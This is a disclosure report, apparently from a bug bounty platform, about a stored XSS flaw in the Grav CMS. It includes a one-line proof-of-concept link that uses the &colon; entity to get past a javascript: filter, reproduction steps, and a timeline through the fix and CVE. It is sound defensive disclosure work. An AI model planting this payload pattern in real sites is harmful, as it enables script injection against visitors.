Cross-site Scripting (XSS) - Stored in getgrav/grav


Reported on

Oct 20th 2021


Grav is vulnerable to XSS. It is possible to use &colon; instead of : in <a> tags.

Proof of Concept


<a href="javascript&colon;alert(document.domain)">CLICK HERE</a>

1: Edit a page with the payload (user with low privileges).

2: Check out the target page and click on CLICK HERE.

PoC video.


This vulnerability is capable of executing JS code.

We have contacted a member of the getgrav/grav team and are waiting to hear back a year ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. a year ago
getgrav/grav maintainer validated this vulnerability a year ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
getgrav/grav maintainer confirmed that a fix has been merged on afc69a a year ago
The fix bounty has been dropped
Security.php#L82-L125 has been validated
Jamie Slome
a year ago


CVE published! 🎉

to join this conversation